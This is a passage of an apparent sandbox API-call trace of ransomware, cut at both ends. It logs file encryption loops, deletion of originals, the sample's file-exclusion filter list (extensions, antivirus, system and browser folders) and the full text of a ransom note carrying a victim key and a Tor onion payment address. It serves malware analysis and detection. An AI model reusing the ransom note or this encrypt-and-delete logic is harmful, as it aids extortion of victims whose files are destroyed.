GetLastError () returned 0x0 [0168.320] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.320] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.320] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.320] GetLastError () returned 0x0 [0168.320] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.320] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.320] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.320] GetLastError () returned 0x0 [0168.320] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.320] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.321] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.321] GetLastError () returned 0x0 [0168.321] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.321] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.321] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.321] GetLastError () returned 0x0 [0168.321] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.321] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.321] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.321] GetLastError () returned 0x0 [0168.321] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.321] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.321] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.321] GetLastError () returned 0x0 [0168.321] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.321] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.321] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.321] GetLastError () returned 0x0 [0168.321] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.321] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.321] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.321] GetLastError () returned 0x0 [0168.321] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.321] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.322] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.322] GetLastError () returned 0x0 [0168.322] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.322] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.322] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.322] GetLastError () returned 0x0 [0168.322] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.322] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.322] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.322] GetLastError () returned 0x0 [0168.322] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.322] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.322] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.322] GetLastError () returned 0x0 [0168.322] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.322] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.322] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.322] GetLastError () returned 0x0 [0168.322] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.322] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.322] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.322] GetLastError () returned 0x0 [0168.322] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.322] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.322] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.322] GetLastError () returned 0x0 [0168.322] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.323] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.323] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.323] GetLastError () returned 0x0 [0168.323] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.323] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.323] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.323] GetLastError () returned 0x0 [0168.323] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.323] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.323] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.323] GetLastError () returned 0x0 [0168.323] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.324] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui") returned 1 [0168.324] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui")) returned 0 [0168.325] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" [0168.325] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US") returned 1 [0168.325] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\.xX51C.tmp" (normalized: "c:\\program files\\common files\\system\\en-us\\.xx51c.tmp")) returned 0x51c [0168.326] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\.xX51C.tmp" (normalized: "c:\\program files\\common files\\system\\en-us\\.xx51c.tmp"), dwFlags=0x1) returned 0 [0168.326] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\.xX51C.tmp" (normalized: "c:\\program files\\common files\\system\\en-us\\.xx51c.tmp")) returned 1 [0168.326] CryptDestroyKey (hKey=0x9ad738) returned 1 [0168.326] wcslen (_String="OK") returned 0x2 [0168.326] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.326] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.326] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0168.326] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0168.326] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0168.327] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\Recovers your files.html" (normalized: "c:\\program files\\common files\\system\\en-us\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0168.327] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0168.328] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0168.328] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0168.328] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.328] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.328] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0168.328] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.328] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*.exe") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*.dll") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*.lnk") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*.bat") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*.ini") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*.msi") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*.scf") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*pagefile.sys*") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*NTUSER.DAT*") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*AppData*") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*\\winrar\\*") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*\\java\\*") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*\\windows\\*") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*\\ESET\\*") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*\\AVG\\*") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*\\AVIRA\\*") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*Atheros*") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*Realtek*") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*bootmgr*") returned 0 [0168.328] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*boot*") returned 0 [0168.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*boot*") returned 0 [0168.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*CONFIG.SYS*") returned 0 [0168.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*IO.SYS*") returned 0 [0168.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*MSDOS.SYS*") returned 0 [0168.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*NTDETECT.COM*") returned 0 [0168.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*ntldr*") returned 0 [0168.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*chrome*") returned 0 [0168.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*opera*") returned 0 [0168.329] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\msadc\\*", pszSpec="*firefox*") returned 0 [0168.329] wcslen (_String="\\\\?\\") returned 0x4 [0168.329] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*", lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 0x9ad7f8 [0168.330] wcscmp (_String1=".", _String2=".") returned 0 [0168.330] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.330] wcscmp (_String1="..", _String2=".") returned 1 [0168.330] wcscmp (_String1="..", _String2="..") returned 0 [0168.330] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*NMCRYPT") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*Recovers your files.html") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*.exe") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*.dll") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*.lnk") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*.bat") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*.ini") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*.msi") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*.scf") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*pagefile.sys*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*NTUSER.DAT*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*AppData*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*\\winrar\\*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*\\Internet Explorer\\*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*\\java\\*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*\\TeamViewer\\*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*\\windows\\*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*\\ESET\\*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*\\AVG\\*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*\\AVIRA\\*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*\\AVAST Software\\*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*Atheros*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*Realtek*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*bootmgr*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*boot*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*boot*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*CONFIG.SYS*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*IO.SYS*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*MSDOS.SYS*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*NTDETECT.COM*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*ntldr*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*chrome*") returned 0 [0168.330] PathMatchSpecW (pszFile="adcjavas.inc", pszSpec="*opera*") 